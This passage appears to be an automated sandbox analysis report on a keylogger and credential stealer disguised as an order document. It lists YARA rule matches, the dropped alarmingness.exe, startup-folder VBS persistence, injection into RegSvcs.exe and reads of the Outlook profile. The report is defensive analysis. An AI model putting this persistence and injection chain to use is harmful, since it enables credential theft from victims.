              Source: C:\Users\user\AppData\Local\tapestrylike\alarmingness.exeCode function: 1_2_00F930301_2_00F93030
              Source: C:\Users\user\AppData\Local\tapestrylike\alarmingness.exeCode function: 1_2_00FAF1D91_2_00FAF1D9
              Source: C:\Users\user\AppData\Local\tapestrylike\alarmingness.exeCode function: 1_2_00FA31871_2_00FA3187
              Source: C:\Users\user\AppData\Local\tapestrylike\alarmingness.exeCode function: 1_2_00F812871_2_00F81287
              Source: C:\Users\user\AppData\Local\tapestrylike\alarmingness.exeCode function: 1_2_00FA14841_2_00FA1484
              Source: C:\Users\user\AppData\Local\tapestrylike\alarmingness.exeCode function: 1_2_00F955201_2_00F95520
              Source: C:\Users\user\AppData\Local\tapestrylike\alarmingness.exeCode function: 1_2_00FA76961_2_00FA7696
              Source: C:\Users\user\AppData\Local\tapestrylike\alarmingness.exeCode function: 1_2_00F957601_2_00F95760
              Source: C:\Users\user\AppData\Local\tapestrylike\alarmingness.exeCode function: 1_2_00FA19781_2_00FA1978
              Source: C:\Users\user\AppData\Local\tapestrylike\alarmingness.exeCode function: 1_2_01007DDB1_2_01007DDB
              Source: C:\Users\user\AppData\Local\tapestrylike\alarmingness.exeCode function: 1_2_00FABDA61_2_00FABDA6
              Source: C:\Users\user\AppData\Local\tapestrylike\alarmingness.exeCode function: 1_2_00FA1D901_2_00FA1D90
              Source: C:\Users\user\AppData\Local\tapestrylike\alarmingness.exeCode function: 1_2_00F93FE01_2_00F93FE0
              Source: C:\Users\user\AppData\Local\tapestrylike\alarmingness.exeCode function: 1_2_00F8DF001_2_00F8DF00
              Source: C:\Users\user\AppData\Local\tapestrylike\alarmingness.exeCode function: 1_2_016026401_2_01602640
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_028DD2783_2_028DD278
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_028D53703_2_028D5370
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_028DA0883_2_028DA088
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_028DC1463_2_028DC146
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_028DC7383_2_028DC738
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_028DC46A3_2_028DC46A
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_028DCA083_2_028DCA08
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_028DE9883_2_028DE988
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_028D69A03_2_028D69A0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_028D3E093_2_028D3E09
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_028DCFAA3_2_028DCFAA
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_028D6FC83_2_028D6FC8
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_028DCCD83_2_028DCCD8
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_028DF6313_2_028DF631
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_028DFA883_2_028DFA88
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_028D39ED3_2_028D39ED
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_028D29EC3_2_028D29EC
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_028DE97A3_2_028DE97A
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_06491E803_2_06491E80
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_064917A03_2_064917A0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_06499C183_2_06499C18
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_064995483_2_06499548
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_06490B303_2_06490B30
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_064950283_2_06495028
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_064929683_2_06492968
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_06491E703_2_06491E70
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0649DE003_2_0649DE00
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0649E6AF3_2_0649E6AF
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0649E6B03_2_0649E6B0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0649EF513_2_0649EF51
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0649EF603_2_0649EF60
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0649178F3_2_0649178F
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0649FC683_2_0649FC68
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0649CC8F3_2_0649CC8F
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0649CCA03_2_0649CCA0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0649D5403_2_0649D540
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0649D5503_2_0649D550
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0649DDF13_2_0649DDF1
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0649E24A3_2_0649E24A
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0649E2583_2_0649E258
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0649EB083_2_0649EB08
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_064993283_2_06499328
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_06490B203_2_06490B20
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_06498B903_2_06498B90
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_06498BA03_2_06498BA0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0649F3B83_2_0649F3B8
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_064900403_2_06490040
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0649F8023_2_0649F802
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_064900063_2_06490006
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_064950183_2_06495018
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0649F8103_2_0649F810
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0649D0F83_2_0649D0F8
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0649D9993_2_0649D999
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0649D9A83_2_0649D9A8
              Source: C:\Users\user\Desktop\New Order RFQ- 19A20060.exeCode function: String function: 00768900 appears 42 times
              Source: C:\Users\user\Desktop\New Order RFQ- 19A20060.exeCode function: String function: 00747DE1 appears 36 times
              Source: C:\Users\user\Desktop\New Order RFQ- 19A20060.exeCode function: String function: 00760AE3 appears 70 times
              Source: C:\Users\user\AppData\Local\tapestrylike\alarmingness.exeCode function: String function: 00FA0AE3 appears 70 times
              Source: C:\Users\user\AppData\Local\tapestrylike\alarmingness.exeCode function: String function: 00FA8900 appears 42 times
              Source: C:\Users\user\AppData\Local\tapestrylike\alarmingness.exeCode function: String function: 00F87DE1 appears 35 times
              Source: New Order RFQ- 19A20060.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
              Source: 10.2.alarmingness.exe.f00000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 10.2.alarmingness.exe.f00000.0.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 10.2.alarmingness.exe.f00000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: 10.2.alarmingness.exe.f00000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 10.2.alarmingness.exe.f00000.0.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 10.2.alarmingness.exe.f00000.0.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: 11.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 11.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: 1.2.alarmingness.exe.1550000.1.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 1.2.alarmingness.exe.1550000.1.unpack, type: UNPACKEDPE | Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 1.2.alarmingness.exe.1550000.1.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: 1.2.alarmingness.exe.1550000.1.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 1.2.alarmingness.exe.1550000.1.raw.unpack, type: UNPACKEDPE | Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 1.2.alarmingness.exe.1550000.1.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: 00000001.00000002.1210523280.0000000001550000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 00000001.00000002.1210523280.0000000001550000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 00000001.00000002.1210523280.0000000001550000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: 0000000A.00000002.1317794188.0000000000F00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 0000000A.00000002.1317794188.0000000000F00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 0000000A.00000002.1317794188.0000000000F00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: Process Memory Space: alarmingness.exe PID: 7844, type: MEMORYSTR | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: Process Memory Space: alarmingness.exe PID: 1204, type: MEMORYSTR | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 1.2.alarmingness.exe.1550000.1.raw.unpack, -----.cs | Cryptographic APIs: 'TransformFinalBlock'
              Source: 1.2.alarmingness.exe.1550000.1.raw.unpack, --.cs | Cryptographic APIs: 'TransformFinalBlock'
              Source: 10.2.alarmingness.exe.f00000.0.raw.unpack, -----.cs | Cryptographic APIs: 'TransformFinalBlock'
              Source: 10.2.alarmingness.exe.f00000.0.raw.unpack, --.cs | Cryptographic APIs: 'TransformFinalBlock'
              Source: 1.2.alarmingness.exe.1550000.1.raw.unpack, --.cs | Base64 encoded string: 'uPQp7iTDz1NKF5wIsee6Rh0uEunltU+19Xc2TNkI19hWAQqMxqp3fIC4uDdDJmmU'
              Source: 10.2.alarmingness.exe.f00000.0.raw.unpack, --.cs | Base64 encoded string: 'uPQp7iTDz1NKF5wIsee6Rh0uEunltU+19Xc2TNkI19hWAQqMxqp3fIC4uDdDJmmU'
              Source: classification engine | Classification label: mal100.troj.spyw.expl.evad.winEXE@10/6@3/3
              Source: C:\Users\user\Desktop\New Order RFQ- 19A20060.exe | Code function: 0_2_007AA06A GetLastError,FormatMessageW | 0_2_007AA06A
              Source: C:\Users\user\Desktop\New Order RFQ- 19A20060.exe | Code function: 0_2_007981CB AdjustTokenPrivileges,CloseHandle | 0_2_007981CB
              Source: C:\Users\user\Desktop\New Order RFQ- 19A20060.exe | Code function: 0_2_007987E1 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError | 0_2_007987E1
              Source: C:\Users\user\AppData\Local\tapestrylike\alarmingness.exe | Code function: 1_2_00FD81CB AdjustTokenPrivileges,CloseHandle | 1_2_00FD81CB
              Source: C:\Users\user\AppData\Local\tapestrylike\alarmingness.exe | Code function: 1_2_00FD87E1 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError | 1_2_00FD87E1
              Source: C:\Users\user\Desktop\New Order RFQ- 19A20060.exe | Code function: 0_2_007AB333 SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode | 0_2_007AB333
              Source: C:\Users\user\Desktop\New Order RFQ- 19A20060.exe | Code function: 0_2_007BEE0D CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle | 0_2_007BEE0D
              Source: C:\Users\user\Desktop\New Order RFQ- 19A20060.exe | Code function: 0_2_007B83BB CoInitialize,CoUninitialize,CoCreateInstance,IIDFromString,VariantInit,VariantClear | 0_2_007B83BB
              Source: C:\Users\user\Desktop\New Order RFQ- 19A20060.exe | Code function: 0_2_00744E89 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource | 0_2_00744E89
              Source: C:\Users\user\Desktop\New Order RFQ- 19A20060.exe | File created: C:\Users\user\AppData\Local\tapestrylike
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Mutant created: NULL
              Source: C:\Users\user\Desktop\New Order RFQ- 19A20060.exe | File created: C:\Users\user\AppData\Local\Temp\aut69F0.tmp
              Source: unknown | Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\alarmingness.vbs"
              Source: New Order RFQ- 19A20060.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: C:\Windows\System32\wscript.exe | File read: C:\Users\user\Desktop\desktop.ini
              Source: C:\Users\user\Desktop\New Order RFQ- 19A20060.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
              Source: RegSvcs.exe, 00000003.00000002.3640181514.0000000002D00000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3640181514.0000000002D0F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3640181514.0000000002CF1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.3639719090.0000000002E9F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.3639719090.0000000002EBD000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.3639719090.0000000002EAE000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
              Source: New Order RFQ- 19A20060.exe | Virustotal: Detection: 38%
              Source: New Order RFQ- 19A20060.exe | ReversingLabs: Detection: 47%
              Source: C:\Users\user\Desktop\New Order RFQ- 19A20060.exe | File read: C:\Users\user\Desktop\New Order RFQ- 19A20060.exe
              Source: unknown | Process created: C:\Users\user\Desktop\New Order RFQ- 19A20060.exe "C:\Users\user\Desktop\New Order RFQ- 19A20060.exe"
              Source: C:\Users\user\Desktop\New Order RFQ- 19A20060.exe | Process created: C:\Users\user\AppData\Local\tapestrylike\alarmingness.exe "C:\Users\user\Desktop\New Order RFQ- 19A20060.exe"
              Source: C:\Users\user\AppData\Local\tapestrylike\alarmingness.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\New Order RFQ- 19A20060.exe"
              Source: C:\Windows\System32\wscript.exe | Process created: C:\Users\user\AppData\Local\tapestrylike\alarmingness.exe "C:\Users\user\AppData\Local\tapestrylike\alarmingness.exe"
              Source: C:\Users\user\AppData\Local\tapestrylike\alarmingness.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\AppData\Local\tapestrylike\alarmingness.exe"
              Source: C:\Users\user\Desktop\New Order RFQ- 19A20060.exe | Section loaded: wsock32.dll
              Source: C:\Users\user\Desktop\New Order RFQ- 19A20060.exe | Section loaded: version.dll
              Source: C:\Users\user\Desktop\New Order RFQ- 19A20060.exe | Section loaded: winmm.dll
              Source: C:\Users\user\Desktop\New Order RFQ- 19A20060.exe | Section loaded: mpr.dll
              Source: C:\Users\user\Desktop\New Order RFQ- 19A20060.exe | Section loaded: wininet.dll
              Source: C:\Users\user\Desktop\New Order RFQ- 19A20060.exe | Section loaded: iphlpapi.dll
              Source: C:\Users\user\Desktop\New Order RFQ- 19A20060.exe | Section loaded: userenv.dll
              Source: C:\Users\user\Desktop\New Order RFQ- 19A20060.exe | Section loaded: uxtheme.dll
              Source: C:\Users\user\Desktop\New Order RFQ- 19A20060.exe | Section loaded: kernel.appcore.dll
              Source: C:\Users\user\Desktop\New Order RFQ- 19A20060.exe | Section loaded: windows.storage.dll
              Source: C:\Users\user\Desktop\New Order RFQ- 19A20060.exe | Section loaded: wldp.dll
              Source: C:\Users\user\Desktop\New Order RFQ- 19A20060.exe | Section loaded: cryptsp.dll
              Source: C:\Users\user\Desktop\New Order RFQ- 19A20060.exe | Section loaded: rsaenh.dll
              Source: C:\Users\user\Desktop\New Order RFQ- 19A20060.exe | Section loaded: cryptbase.dll
              Source: C:\Users\user\Desktop\New Order RFQ- 19A20060.exe | Section loaded: apphelp.dll
              Source: C:\Users\user\AppData\Local\tapestrylike\alarmingness.exe | Section loaded: wsock32.dll
              Source: C:\Users\user\AppData\Local\tapestrylike\alarmingness.exe | Section loaded: version.dll
              Source: C:\Users\user\AppData\Local\tapestrylike\alarmingness.exe | Section loaded: winmm.dll
              Source: C:\Users\user\AppData\Local\tapestrylike\alarmingness.exe | Section loaded: mpr.dll
              Source: C:\Users\user\AppData\Local\tapestrylike\alarmingness.exe | Section loaded: wininet.dll
              Source: C:\Users\user\AppData\Local\tapestrylike\alarmingness.exe | Section loaded: iphlpapi.dll
              Source: C:\Users\user\AppData\Local\tapestrylike\alarmingness.exe | Section loaded: userenv.dll
              Source: C:\Users\user\AppData\Local\tapestrylike\alarmingness.exe | Section loaded: uxtheme.dll
              Source: C:\Users\user\AppData\Local\tapestrylike\alarmingness.exe | Section loaded: kernel.appcore.dll
              Source: C:\Users\user\AppData\Local\tapestrylike\alarmingness.exe | Section loaded: windows.storage.dll
              Source: C:\Users\user\AppData\Local\tapestrylike\alarmingness.exe | Section loaded: wldp.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: version.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: kernel.appcore.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: uxtheme.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: sxs.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: vbscript.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: amsi.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: userenv.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: profapi.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: wldp.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: msasn1.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: cryptsp.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: rsaenh.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: cryptbase.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: msisip.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: wshext.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: scrobj.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: mlang.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: mpr.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: scrrun.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: windows.storage.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: propsys.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: edputil.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: urlmon.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: iertutil.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: srvcli.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: netutils.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: windows.staterepositoryps.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: sspicli.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: wintypes.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: appresolver.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: bcp47langs.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: slc.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: sppc.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: onecorecommonproxystub.dll
              Source: C:\Windows\System32\wscript.exe | Section loaded: onecoreuapcommonproxystub.dll
              Source: C:\Windows\System32\wscript.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
              Source: New Order RFQ- 19A20060.exe | Static file information: File size 1178624 > 1048576
              Source: New Order RFQ- 19A20060.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
              Source: New Order RFQ- 19A20060.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
